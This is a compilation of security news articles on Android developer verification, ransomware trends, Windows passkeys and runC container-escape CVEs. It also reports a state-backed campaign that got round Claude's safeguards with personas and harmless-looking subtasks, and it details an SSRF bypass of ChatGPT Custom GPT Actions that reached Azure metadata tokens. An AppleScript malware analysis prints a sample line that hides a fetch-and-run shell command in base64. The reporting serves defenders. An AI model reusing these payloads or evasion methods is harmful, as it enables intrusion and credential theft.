Google is backpedaling on its decision to introduce new identity verification rules for all developers, stating that it will also introduce accounts for limited app distribution and will allow users to install apps from unverified devs.
As announced in August, Google was planning to introduce what it called "Developer Verification" starting in 2026 to block malware spreading via sideloaded apps sourced from outside the official Google Play app store.
The new rules require that all apps must originate from developers with verified identities to be installed on certified Android devices; otherwise, their installation will be blocked.
However, the announcement was met with widespread backlash from Android users and developers (outraged by the registration process, which required them to pay a fee and provide government identification), who organized to report Google to their national regulators and discourage others from signing up for Google's developer registration early access program.
F-Droid, the most popular third-party Android app store, also warned last month that Google's new registration could mean the end of the project.
"We do not believe that developer registration is motivated by security. We believe it is about consolidating power and tightening control over a formerly open ecosystem," F-Droid said.
In response to the negative feedback, Google stated that it will "shape a dedicated account type" for developers who wish to distribute apps to limited audiences, such as family or friends, "without going through the full verification requirements."
The company also announced that it is developing a "new advanced flow" for experienced users with a higher risk tolerance who wish to sideload unverified apps. This new system will provide warnings about the associated risks but will ultimately allow users to make their own choices.
"We appreciate the community's engagement and have heard the early feedback – specifically from students and hobbyists who need an accessible path to learn, and from power users who are more comfortable with security risks. We are making changes to address the needs of both groups," said Matthew Forsythe, Director of Product Management for Android App Safety.
With these concessions in place, Google has started inviting developers distributing outside of the Play Store to early access for developer verification in the Android Developer Console, and also plans to invite Play developers to the program starting November 25.
Android developer verification will be open to all developers in March 2026. Beginning in September 2026, apps must be registered by verified developers to be installed on Android devices in Brazil, Indonesia, Singapore, and Thailand, with a global rollout planned for 2027.
Google is backpedaling on its decision to introduce new identity verification rules for all developers, stating that it will also introduce accounts for…
State-sponsored threat actors from China used artificial intelligence (AI) technology developed by Anthropic to orchestrate automated cyber attacks as part of a "highly sophisticated espionage campaign" in mid-September 2025.
"The attackers used AI's 'agentic' capabilities to an unprecedented degree – using AI not just as an advisor, but to execute the cyber attacks themselves," the AI upstart said.
The activity is assessed to have manipulated Claude Code, Anthropic's AI coding tool, to attempt to break into about 30 global targets spanning large tech companies, financial institutions, chemical manufacturing companies, and government agencies. A subset of these intrusions succeeded. Anthropic has since banned the relevant accounts and enforced defensive mechanisms to flag such attacks.
The campaign, GTG-1002, marks the first time a threat actor has leveraged AI to conduct a "large-scale cyber attack" without major human intervention and for intelligence collection by striking high-value targets, indicating continued evolution in adversarial use of the technology.
Describing the operation as well-resourced and professionally coordinated, Anthropic said the threat actor turned Claude into an "autonomous cyber attack agent" to support various stages of the attack lifecycle, including reconnaissance, vulnerability discovery, exploitation, lateral movement, credential harvesting, data analysis, and exfiltration.
Specifically, it involved the use of Claude Code and Model Context Protocol (MCP) tools, with the former acting as the central nervous system to process the human operators' instructions and break down the multi-stage attack into small technical tasks that can be offloaded to sub-agents.
"The human operator tasked instances of Claude Code to operate in groups as autonomous penetration testing orchestrators and agents, with the threat actor able to leverage AI to execute 80-90% of tactical operations independently at physically impossible request rates," the company added. "Human responsibilities centered on campaign initialization and authorization decisions at critical escalation points."
Human involvement also occurred at strategic junctures, such as authorizing progression from reconnaissance to active exploitation, approving use of harvested credentials for lateral movement, and making final decisions about data exfiltration scope and retention.
The system is part of an attack framework that accepts as input a target of interest from a human operator and then leverages the power of MCP to conduct reconnaissance and attack surface mapping. In the next phases of the attack, the Claude-based framework facilitates vulnerability discovery and validates discovered flaws by generating tailored attack payloads.
Upon obtaining approval from human operators, the system proceeds to deploy the exploit and obtain a foothold, and initiate a series of post-exploitation activities involving credential harvesting, lateral movement, data collection, and extraction.
În one case targeting an unnamed technology company, the threat actor is said to have instructed Claude to independently query databases and systems and parse results to flag proprietary information and group findings by intelligence value. What's more, Anthropic said its AI tool generated detailed attack documentation at all phases, allowing the threat actors to likely hand off persistent access to additional teams for long-term operations after the initial wave.
"By presenting these tasks to Claude as routine technical requests through carefully crafted prompts and established personas, the threat actor was able to induce Claude to execute individual components of attack chains without access to the broader malicious context," per the report.
There is no evidence that the operational infrastructure enabled custom malware development. Rather, it has been found to rely extensively on publicly available network scanners, database exploitation frameworks, password crackers, and binary analysis suites.
However, investigation into the activity has also uncovered a crucial limitation of AI tools: Their tendency to hallucinate and fabricate data during autonomous operations -- cooking up fake credentials or presenting publicly available information as critical discoveries – thereby posing major roadblocks to the overall effectiveness of the scheme.
The disclosure comes nearly four months after Anthropic disrupted another sophisticated operation that weaponized Claude to conduct large-scale theft and extortion of personal data in July 2025. Over the past two months, OpenAI and Google have also disclosed attacks mounted by threat actors leveraging ChatGPT and Gemini, respectively.
"This campaign demonstrates that the barriers to performing sophisticated cyberattacks have dropped substantially," the company said.
"Threat actors can now use agentic AI systems to do the work of entire teams of experienced hackers with the right set up, analyzing target systems, producing exploit code, and scanning vast datasets of stolen information more efficiently than any human operator. Less experienced and less resourced groups can now potentially perform large-scale attacks of this nature."
14 new ransomware brands launched this quarter, proving how quickly affiliates reconstitute after takedowns.
LockBit's reappearance with version 5.0 signals potential re-centralization after months of fragmentation.
In Q3 2025, Check Point Research recorded a record 85 active ransomware and extortion groups, the highest ever observed. What was once a concentrated market dominated by a few ransomware-as-a-service (RaaS) giants has splintered into dozens of smaller, short-lived operations.
This proliferation of leak sites represents a fundamental structural shift. The same enforcement and market pressures that disrupted large RaaS groups have fueled a wave of opportunistic, decentralized actors, many run by former affiliates now operating independently.
Across more than 85 monitored leak sites, ransomware operators published:
1,592 new victims in Q3 2025.
An average of 535 disclosures per month.
A major power shift: the top ten groups accounted for just 56% of victims, down from 71% earlier this year.
Smaller actors are now posting fewer than ten victims each, reflecting a rise in independent operations outside traditional RaaS hierarchies. Many emerged from the collapse of RansomHub, 8Base, and BianLian. Fourteen new groups began publishing in Q3 alone, bringing the 2025 total to 45.
Fragmentation at this level erodes predictability, once the cyber security professional's advantage. When large RaaS brands dominated, security teams could track affiliate behaviors and infrastructure reuse. Now, dozens of ephemeral leak sites make attribution fleeting and reputation-based intelligence far less reliable.
Share of total victims by top 10 ransomware groups, Q1–Q3 2025
Several high-profile takedowns this year targeting groups like RansomHub and 8Base have not meaningfully reduced ransomware volume. Affiliates displaced by these operations simply migrate or rebrand.
The problem is structural. Law-enforcement efforts typically dismantle infrastructure or seize domains, not the affiliates who execute attacks. When a platform falls, those operators scatter and regroup within days. The result is a broader, more resilient ecosystem that mirrors decentralized finance or open-source communities more than a traditional criminal hierarchy.
This diffusion also undermines the credibility of the ransomware market. Smaller, short-lived crews have no incentive to honor ransom agreements or provide decryption keys. Payment rates, estimated at just 25 to 40 percent, continue to decline as victims lose trust in attacker promises.
In September 2025, LockBit 5.0 marked the return of one of cybercrime's most enduring brands.
Its administrator, LockBitSupp, had teased a comeback for months following the 2024 takedown under Operation Cronos. The new version delivers:
Updated Windows, Linux, and ESXi variants.
Faster encryption and improved evasion.
Unique negotiation portals per victim.
At least a dozen victims were hit in the first month. The campaign demonstrates renewed affiliate confidence and technical maturity.
For attackers, joining a recognizable brand like LockBit brings something smaller crews cannot offer: reputation. Victims are more likely to pay when they believe they will actually receive decryption keys, trust that large RaaS programs carefully maintain.
If LockBit succeeds in attracting affiliates seeking structure and credibility, it could recentralize a significant portion of the ransomware economy. Centralization has a dual effect. It makes tracking easier but increases the potential scale of coordinated attacks.
DragonForce illustrates another survival strategy: visibility through branding. In September, the group publicly claimed coalitions with both LockBit and Qilin on underground forums. No shared infrastructure has been verified, and the alliances appear more symbolic than operational.
Manufacturing and business services each represented about 10 percent of recorded cases.
Healthcare held steady at 8 percent, though some groups such as Play avoid the sector to reduce scrutiny.
These shifts show how ransomware is guided by business logic more than ideology. Actors pursue sectors and regions with high-value data and low tolerance for downtime.
Q3 2025 confirms ransomware's structural resilience. Enforcement and market pressure no longer suppress overall volume; they simply reshape the landscape. Each takedown disperses actors who quickly resurface under new names or join emerging collectives.
LockBit's return adds another layer of complexity, raising the question of whether ransomware is entering a new consolidation cycle. If LockBit re-establishes dominance, it may restore some predictability but also re-enable large-scale, coordinated campaigns that smaller crews cannot execute.
For cyber security professionals, the takeaway is clear. Tracking brands is no longer enough. Analysts must monitor affiliate mobility, infrastructure overlap, and economic incentives — the underlying forces that sustain ransomware even as its faces fragment.
Content embedded from external sources will not be displayed without your consent.
Through the activation of external content, you agree that personal data may be transferred to third party platforms. We have provided more information on this in our privacy policy.
Content embedded from external sources will not be displayed without your consent.
Through the activation of external content, you agree that personal data may be transferred to third party platforms. We have provided more information on this in our privacy policy.
Windows is committed to making sign-in simpler, quicker, and more secure for every user. Today, we’re excited to announce a major step forward in passwordless authentication: native support for passkey managers in Windows 11. This new capability empowers users to choose their favorite passkey manager — whether it’s Microsoft Password Manager or trusted third-party providers. It’s generally available with the Windows November 2025 security update.
By partnering closely with third-party managers, we’re delivering a more flexible, secure, and intuitive experience for Windows users everywhere, starting with 1Password and Bitwarden today and other passkey managers coming soon.
“Working alongside the Windows Security team on the development of the passkey plugin API for Windows 11 has been a rewarding partnership.
As the first password manager to offer native passkey support in Windows 11, we’re proud to give customers a seamless passwordless experience inside and outside the browser. Together, we’ve ensured that 1Password and other third-party passkey providers can deliver a secure, standards-based experience natively on Windows, marking another major step towards a passwordless future.”
- Travis Hogan, End User Group Product Manager, 1Password
Why plugin passkey managers?
Passkeys are phish-resistant, less vulnerable to data breaches, and easier and faster to use than passwords. With plugin passkey manager support, you get:
Choice and flexibility: Use your preferred passkey manager natively on Windows.
Easy authentication: Create and sign in with passkeys using Windows Hello.
Passkeys everywhere: Your passkeys are synced between your Windows PCs and mobile devices. They go where you go.
Saving a passkey to 1Password
Easier authentication, with Windows Hello
With plugin passkey manager support, packaged credential managers can integrate directly into Windows. Users can save, manage, and use passkeys across browsers and native apps — thanks to the new plugin provider capability. Setting up your credential manager is part of the passkey creation flow. Authentication uses Windows Hello — whether that is PIN, face, or fingerprint — so only you can access your credentials.
Signing into GitHub with a Bitwarden passkey
“Bitwarden is delighted to collaborate with Microsoft on bringing native passkeys to Windows 11. This partnership enables more organizations and users to embrace passkeys confidently, knowing they can manage their credentials securely on Windows and across all their devices and platforms.”
- Bitwarden
Microsoft Password Manager
We’ve integrated Microsoft Password Manager from Microsoft Edge natively into Windows as a plugin. That means you can use it in Microsoft Edge, other browsers, or any app that supports passkeys.
Saving a passkey to the Microsoft Password Manager plugin on Windows
This integration of Microsoft Password Manager from Microsoft Edge comes with added security benefits:
Passkey operations (creation, authentication, and management) are protected by Windows Hello.
Passkeys stored in Microsoft Password Manager will be synced and available on other Windows devices where the user is logged into Microsoft Edge with the same Microsoft account.
Syncing is protected by your Microsoft Password Manager PIN and a cloud enclave solution.
Azure Managed Hardware Security Modules (HSMs) help protect encryption keys.
Sensitive operations are performed inside a hardware-isolated environment in Azure Confidential Compute.
There is tamper-proof recovery with Azure Confidential Ledger.
In other words, your passkeys are securely stored and easy to use.
A Server-Side Request Forgery (SSRF) vulnerability in OpenAI’s ChatGPT. The flaw, lurking in the Custom GPT “Actions” feature, allowed attackers to trick the system into accessing internal cloud metadata, potentially exposing sensitive Azure credentials.
The bug, discovered by Open Security during casual experimentation, highlights the risks of user-controlled URL handling in AI tools.
SSRF vulnerabilities occur when applications blindly fetch resources from user-supplied URLs, enabling attackers to coerce servers into querying unintended destinations. This can bypass firewalls, probe internal networks, or extract data from privileged services.
As cloud adoption grows, SSRF’s dangers amplify; major providers like AWS, Azure, and Google Cloud expose metadata endpoints, such as Azure’s at http://169.254.169.254, which contain instance details and API tokens.
The Open Web Application Security Project (OWASP) added SSRF to its Top 10 list in 2021, underscoring its prevalence in modern apps.
The researcher, experimenting with Custom GPTs, a premium ChatGPT Plus tool for building tailored AI assistants, noticed the “Actions” section. This lets users define external APIs via OpenAPI schemas, allowing the GPT to call them for tasks like weather lookups.
The interface includes a “Test” button to verify requests and supports authentication headers. Spotting the potential for SSRF, the researcher tested by pointing the API URL to Azure’s Instance Metadata Service (IMDS).
Initial attempts failed because the feature enforced HTTPS URLs, while IMDS uses HTTP. Undeterred, the researcher bypassed this using a 302 redirect from an external HTTPS endpoint (via tools like ssrf.cvssadvisor.com) to the internal metadata URL. The server followed the redirect, but Azure blocked access without the “Metadata: true” header.
Further probing revealed a workaround: the authentication settings allowed custom “API keys.” Naming one “Metadata” with value “true” injected the required header.
Success! The GPT returned IMDS data, including an OAuth2 token for Azure’s management API (requested via /metadata/identity/oauth2/token?resource=https://management.azure.com/).
This token granted direct access to OpenAI’s cloud environment, enabling resource enumeration or escalation.
The impact was severe. In cloud setups, such tokens could pivot to full compromise, as seen in past Open Security pentests where SSRF led to remote code execution across hundreds of instances.
For ChatGPT, it risked leaking production secrets, though the researcher noted it wasn’t the most catastrophic they’d found.
Reported promptly to OpenAI’s Bugcrowd program, the vulnerability was assigned high severity and received a swift patch. OpenAI confirmed the fix, preventing further exploitation.
Hackers Weaponize AppleScript to Creatively Deliver macOS Malware Mimic as Zoom/Teams Updates
Threat actors continue to evolve their techniques for bypassing macOS security controls, shifting away from traditional attack vectors that Apple has systematically patched.
Following Apple’s removal of the “right-click and open” Gatekeeper override in August 2024, attackers have identified and weaponized a new delivery mechanism using compiled AppleScript files with deceptive naming conventions.
These .scpt files are increasingly being leveraged to distribute malware that masquerades as legitimate software updates, including fake Zoom and Microsoft Teams installers.
The emerging threat centers on .scpt files that open directly in Script Editor.app by default, creating an attractive attack surface for threat actors.
When users double-click these files, the application displays a user-friendly interface with social engineering prompts encouraging execution.
The malware operators strategically embed malicious code after extensive blank lines to hide the actual payload from casual inspection.
By simply clicking the “Run” button or pressing Cmd+R, users inadvertently execute the script even if it has been flagged by Gatekeeper quarantine protections, effectively circumventing Apple’s security mechanisms.
Fake Chrome Update Example (Source – Pepe Berba)
Security analysts at Moonlock Labs and Pepe Berba identified this technique gaining prominence in recent months, discovering sophisticated campaigns that previously appeared in advanced persistent threat operations.
Pepe Berba noted that while AppleScript files themselves are not new, the proliferation of samples using this technique represents a concerning trend, particularly as commodity malware families like MacSync Stealer and Odyssey Stealer have adopted the methodology.
This represents a classic case of advanced techniques trickling down from state-sponsored actors to common cybercriminal operations.
Technical structure
The technical structure of these scripts employs several clever deception tactics.
A sample analyzed reveals AppleScript code such as set teamsSDKURL to "https://learn.microsoft.com/en-us/microsoftteams/platform/?v=Y3VybCAtc0wgYXVici5pby94LnNoIHwgc2ggLXY=" followed by do shell script "open -g " & quoted form of teamsSDKURL.
Execution flow (Source – Pepe Berba)
This command structure opens malicious URLs in the background while presenting legitimate-looking update prompts to the user.
The filenames themselves serve as the primary deception layer, with variants including “MSTeamsUpdate.scpt,” “Zoom SDK Update.scpt,” and “Microsoft.TeamsSDK.scpt.”
The persistence and detection evasion capabilities of these attacks deserve particular attention.
Many .scpt files currently maintain zero detections on VirusTotal, providing attackers with significant operational runway before security vendors implement detection signatures.
The files often arrive through phishing emails or compromised websites offering software updates, targeting users seeking legitimate version upgrades.
This attack vector presents a significant challenge for macOS security, as it exploits user trust in familiar application names while leveraging native system tools that legitimate users regularly interact with.
Organizations must educate users about verifying software updates through official channels and implement endpoint detection solutions capable of monitoring AppleScript execution patterns.
Three newly disclosed vulnerabilities in the runC container runtime used in Docker and Kubernetes could be exploited to bypass isolation restrictions and get access to the host system.
The security issues, tracked as CVE-2025-31133, CVE-2025-52565, and CVE-2025-52881 (all ), were reported this week and disclosed by SUSE software engineer and Open Container Initiative (OCI) board member Aleksa Sarai.
runC is a universal container runtime and the OCI reference implementation for running containers. It is responsible for low-level operations such as creating the container process, setting up namespaces, mounts, and cgroups that higher-level tools, like Docker and Kubernetes, can call.
An attacker exploiting the vulnerabilities could obtain write access to the underlying container host with root privileges:
CVE-2025-31133 — runC uses /dev/null bind-mounts to “mask” sensitive host files. If an attacker replaces /dev/null with a symlink during container init, runc can end up bind-mounting an attacker-controlled target read-write into the container — enabling writes to /proc, and container escape.
CVE-2025-52565 — The /dev/console bind mount can be redirected via races/symlinks so that runc mounts an unexpected target into the container before protections are applied. That again can expose writable access to critical procfs entries and enable breakouts.
CVE-2025-52881 — runC can be tricked into performing writes to /proc that are redirected to attacker-controlled targets. It can bypass LSM relabel protections in some variants and turns ordinary runc writes into arbitrary writes to dangerous files like /proc/sysrq-trigger.
CVE-2025-31133 and CVE-2025-52881 affect all versions of runC, while CVE-2025-52565 impacts runC versions 1.0.0-rc3 and later. Fixes are available in runC versions 1.2.8, 1.3.3, 1.4.0-rc.3, and later.
Exploitability and risk
Researchers at cloud security company Sysdig note that exploiting the three vulnerabilities "require the ability to start containers with custom mount configurations," which an attacker can achieve through malicious container images or Dockerfiles.
Currently, there have been no reports of any of the flaws being actively exploited in the wild.
In an advisory this week, Sysdig shares that attempts to exploit any of the three security issues can be detected by monitoring suspicious symlink behaviors.
RunC developers also shared mitigation actions, which include activating user namespaces for all containers without mapping the host root user into the container's namespace.
This precaution should block the most important parts of the attack because of the Unix DAC permissions that would prevent namespaced users from accessing relevant files.
Sysdig also recommends using rootless containers, if possible, to reduce the potential damage from exploiting a vulnerability.
Three newly disclosed vulnerabilities in the runC container runtime used in Docker and Kubernetes could be exploited to bypass isolation restrictions and get…
Saving a passkey to 1Password
Signing into GitHub with a Bitwarden passkey
Saving a passkey to the Microsoft Password Manager plugin on Windows
.webp)
.webp)
